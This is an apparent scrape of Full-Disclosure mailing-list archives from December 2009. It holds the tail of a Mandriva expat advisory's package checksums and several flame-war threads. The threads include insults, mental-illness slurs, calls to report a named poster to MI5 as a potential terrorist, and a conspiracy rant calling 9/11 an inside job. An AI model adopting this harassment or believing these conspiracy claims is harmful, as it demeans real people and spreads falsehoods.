 6363348acd6f5f6f0fa5c4aa61a6ebbd  2008.0/SRPMS/expat-2.0.1-4.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 03e2988fe55ecd7c7888cdb87ca9e779  
2008.0/x86_64/expat-2.0.1-4.2mdv2008.0.x86_64.rpm
 8322f60c8e9ac7f21243b220951d52ec  
2008.0/x86_64/lib64expat1-2.0.1-4.2mdv2008.0.x86_64.rpm
 7433c14fc17e7c5eaf177c002cc1d75c  
2008.0/x86_64/lib64expat1-devel-2.0.1-4.2mdv2008.0.x86_64.rpm 
 6363348acd6f5f6f0fa5c4aa61a6ebbd  2008.0/SRPMS/expat-2.0.1-4.2mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 a3406f038312e930bcf6e37591cf872a  2009.0/i586/expat-2.0.1-7.2mdv2009.0.i586.rpm
 15a6e0faa82f77c0a29b9db9abbb8930  
2009.0/i586/libexpat1-2.0.1-7.2mdv2009.0.i586.rpm
 7d6e768b90064aed25977f3fa66a86a8  
2009.0/i586/libexpat1-devel-2.0.1-7.2mdv2009.0.i586.rpm 
 778a521e0fe9de8444aebbea544aaceb  2009.0/SRPMS/expat-2.0.1-7.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 7cffc848d7c1018ef8cf2f6ead9c56c7  
2009.0/x86_64/expat-2.0.1-7.2mdv2009.0.x86_64.rpm
 314b0c2ee406f43fa2d48edccb40465d  
2009.0/x86_64/lib64expat1-2.0.1-7.2mdv2009.0.x86_64.rpm
 eeda32bc03d649fe1c1975433532c78d  
2009.0/x86_64/lib64expat1-devel-2.0.1-7.2mdv2009.0.x86_64.rpm 
 778a521e0fe9de8444aebbea544aaceb  2009.0/SRPMS/expat-2.0.1-7.2mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 1700ce9cfb27620758d354d996433e76  2009.1/i586/expat-2.0.1-8.2mdv2009.1.i586.rpm
 517a6e6356a1fc05cea9a7a473ccfd61  
2009.1/i586/libexpat1-2.0.1-8.2mdv2009.1.i586.rpm
 38d04bf472e9d4008fb636149d25fbeb  
2009.1/i586/libexpat1-devel-2.0.1-8.2mdv2009.1.i586.rpm 
 3e6ab6cdb43fff3547b4f24aab4ec82b  2009.1/SRPMS/expat-2.0.1-8.2mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 0c0b11d85cac8a9f3da701e452acb6ad  
2009.1/x86_64/expat-2.0.1-8.2mdv2009.1.x86_64.rpm
 ac3512d4f42111bbee9987c5c93c7005  
2009.1/x86_64/lib64expat1-2.0.1-8.2mdv2009.1.x86_64.rpm
 fd409ba4722686326c9fe1d9db3ead42  
2009.1/x86_64/lib64expat1-devel-2.0.1-8.2mdv2009.1.x86_64.rpm 
 3e6ab6cdb43fff3547b4f24aab4ec82b  2009.1/SRPMS/expat-2.0.1-8.2mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 d9a3e00019a7a0486f22988ba923b22f  
2010.0/i586/expat-2.0.1-10.1mdv2010.0.i586.rpm
 bdcf6e26502cde43c8239de13841afb2  
2010.0/i586/libexpat1-2.0.1-10.1mdv2010.0.i586.rpm
 cd58e1d189212d7b54dc1fda48aa915c  
2010.0/i586/libexpat1-devel-2.0.1-10.1mdv2010.0.i586.rpm 
 c7a0caabeee91810964149052325fc41  
2010.0/SRPMS/expat-2.0.1-10.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 520af61cc436ac5fcef44464e41467e8  
2010.0/x86_64/expat-2.0.1-10.1mdv2010.0.x86_64.rpm
 42198ace124689b5303611d03974d2a3  
2010.0/x86_64/lib64expat1-2.0.1-10.1mdv2010.0.x86_64.rpm
 42bb51a93dfd026f91c7c4181f53988b  
2010.0/x86_64/lib64expat1-devel-2.0.1-10.1mdv2010.0.x86_64.rpm 
 c7a0caabeee91810964149052325fc41  
2010.0/SRPMS/expat-2.0.1-10.1mdv2010.0.src.rpm

 Corporate 3.0:
 b6aaa4059149ce789b85618334255c76  
corporate/3.0/i586/expat-1.95.6-4.2.C30mdk.i586.rpm
 f4a9f6fb4d3e53446ef059fbe3b93bdd  
corporate/3.0/i586/libexpat0-1.95.6-4.2.C30mdk.i586.rpm
 b9d823b63878bb690dc9fddac1ca2a61  
corporate/3.0/i586/libexpat0-devel-1.95.6-4.2.C30mdk.i586.rpm 
 43e083dc87a85e530d7f8206102e1eac  
corporate/3.0/SRPMS/expat-1.95.6-4.2.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 44e65c80d7feb44d67c2e8a168595f66  
corporate/3.0/x86_64/expat-1.95.6-4.2.C30mdk.x86_64.rpm
 de22ad66c1d6b8

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-05 Thread RandallM
> --
>
> Message: 1
> Date: Fri, 4 Dec 2009 21:40:27 -0600
> From: Chris 
> Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday
> To: Benji 
> Cc: r00f r00f , full-disclosure@lists.grok.org.uk
> Message-ID: <20091205034027.12bce7b...@ws5-10.us4.outblaze.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> You're as thick as that other moron.  Congrats on achieving Moron #2 status.
>
> I didn't say I *POSTED*  the code.  I told Moron #1 to read it.
>
> The two errors I highlighted were merely clues so Moron #1 could unfuck 
> himself.
>
>
>
>> - Original Message -
>> From: Benji 
>> To: Chris 
>> Cc: "r00f r00f" , full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday
>> Date: Wed, 2 Dec 2009 14:30:09 +
>>
>>
>> Just FYI, what you posted isn't code, but actually an error message. Just 
>> FYI.
>>


I think it should be a mandate that morning coffee along with
exercise be done before reading mail.

-- 
been great, thanks
a.k.a System



Re: [Full-disclosure] The Cyber War Conspiracy

2009-12-05 Thread Sam Haldorf
Why do you speak of yourself in quotes? It makes you look batshit insane.

Andrew Wallace sounds like a terrorist. He's psychologically projecting.

n3td3v could be a legitimate cyber threat, in my opinion. He's a _creepy_ 
person.

--- n3td3v  wrote on Fri, 4.12.2009:

From: n3td3v 
Subject: Re: [Full-disclosure] The Cyber War Conspiracy
To: "Sam Haldorf" , full-disclosure@lists.grok.org.uk
Date: Friday, 4 December 2009, 23:28

You're a paranoid schizophrenic if you think "n3td3v" is all of those
people and / or a threat to anyone.

On Fri, Dec 4, 2009 at 10:32 PM, Sam Haldorf  wrote:
>
> What? Don't contact me you sick pervert.
>
> Someone please find out this subjects address and notify the government of 
> him. Jesus.
>
> Take it from Mr. Wallace, "If you suspect it, report it: 0800 789 321"
>
> n3td3v is probably ureleet, full-censorship, full-disclosure, antisec, jdl 
> and valdis.
>
> Please don't contact me. You're really scary.
>
> Take your medication and kindly leave.
>
> --- full-disclos...@safe-mail.net  wrote on 
> Tue, 1.12.2009:
>
> From: full-disclos...@safe-mail.net 
> Subject: Re: AW: [Full-disclosure] The Cyber War Conspiracy
> To: sahald...@ymail.com, full-disclosure@lists.grok.org.uk
> Date: Tuesday, 1 December 2009, 5:51
>
> I bet you to it mate but good troll attempt all the same ;)
>
> http://lists.grok.org.uk/pipermail/full-disclosure/2008-September/064425.html
>
> Hey Sam, amma let you finish, but n3td3v was the best troll of all time!
>
>  Original Message 
> From: Sam Haldorf 
> To: full-disclosure@lists.grok.org.uk
> Cc: full-disclos...@safe-mail.net
> Subject: AW: [Full-disclosure] The Cyber War Conspiracy
> Date: Mon, 30 Nov 2009 11:08:49 -0800 (PST)
>
>
> This is just doing too far.
>
> He's obviously a paranoid schizophrenic who uses aliases to bring attention 
> to himself. This means he's a loose cannon. A potential lone wolf terrorist. 
> Who knows, he may decide to do something nasty to bring attention to his 
> causes.
>
> It's obvious as Andrew Wallace's paranoia grows, his interest is going from 
> infosec (trolling FD) to real life. He may to adapt his attention-seeking MO 
> to real life, where he may harm real people. See what I mean?
>
> You know what you have to do.
>
> http://preview.tinyurl.com/report-n3td3v-to-MI5
>
> Paste his paranoid ramblings in there. This will help the government prevent 
> n3td3v from causing harm. They will keep a good eye on him.
>
> Warning: Do _not_ lie or in any way misrepresent the truth when reporting him. 
> Just state the obvious if you do in fact consider him a threat. Which I 
> obviously do.
>
> Thank you,
> Sam H
>
> --- full-disclos...@safe-mail.net  wrote on 
> Mon, 30.11.2009:
>
> From: full-disclos...@safe-mail.net 
> Subject: [Full-disclosure] The Cyber War Conspiracy
> To: full-disclosure@lists.grok.org.uk
> Date: Monday, 30 November 2009, 10:45
>
> It is my understanding the "security industry" would like nothing better than 
> a cyber war to kick off, mass profit, mass employment, mass political capital 
> to hit "cyber security" into the main stream of society to strike at the 
> heart of the single mom and retired couple crowd.
>
> Cyber War is a touchy subject if you ask any "security professional" they 
> don't like people saying straight out "cyber war is bullshit". They get 
> emotional about it, it's as if they want it to happen. I see a build up 
> towards "Cyber War", the people in power such as Gadi Evron, he wants a Cyber 
> War it's all he talks about. He was the first person to draw conclusions out 
> of fine air and were quick to blame the Russians for Estonia, even though 
> there was no evidence.
>
> Just like 9/11, you knew it was an inside job because they announced within 
> 24 hours they _knew_ it was Al-Qaeda even though they weren't able to stop 
> the attack if they knew so much about it.
>
> Estonia turned out to be a kid in his bedroom with some bot net command & 
> control, not the actual work of a super power.
>
> SANS want Cyber War, they asked the CIA to come to their SCADA conference in 
> 2008 to puke up a bunch of nonsense that Hackers had darkened cities, in fact 
> the event never happened or took place it was sheer propaganda, misleading 
> bullshit to build up the path for "Cyber War".
>
> "No cyberwar yet, but soon, says firm" a headline says on Securityfocus--- 
> This is a warning that something bad is about to happen. A cyber 9/11? The 
> security industry need cyber war, the hacker scene is falling flat before our 
> eyes there is no spectacular-event happened for a while, virus outbreaks and 
> worms just don't happen like they used to to keep "cyber security" in high 
> profile.
>
> The pro-propaganda for "cyber security" is running out, the security industry 
> is crying out for a cyber 9/11 scale event and that's what scares me.
>
> One of the first things Obama took seriously when he went into the White 
> House was Cyber Security, and remember the M

Re: [Full-disclosure] The Cyber War Conspiracy

2009-12-05 Thread Gichuki John Chuksjonia
K, full-disclos...@safe-mail.net or whoever you are, I think you are
watching too much of 24 or even Spooks. Please quit and relax a bit!!!

./Chuks

On 12/5/09, Paul Schmehl  wrote:
> --On December 4, 2009 10:44:20 PM -0600 valdis.kletni...@vt.edu wrote:
>
>>
>> On Fri, 04 Dec 2009 14:32:34 PST, Sam Haldorf said:
>>
>>> n3td3v is probably ureleet, full-censorship, full-disclosure, antisec,
>>> jdl and valdis.
>>
>> He might be those other dudes, but he's not me.  If I was going to pose
>> as
>> a troll, I'd pose as a more clueful troll - trying to think that
>> cluelessly
>> makes my brain hurt.
>>
>> On the other hand, nobody's ever seen me and Paul Schmehl at the same
>> place
>> at the same time... I wonder why... :)
>
> Because we have no travel money.  :-)
>
> Paul Schmehl, If it isn't already
> obvious, my opinions are my own
> and not those of my employer.
> **
> WARNING: Check the headers before replying
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
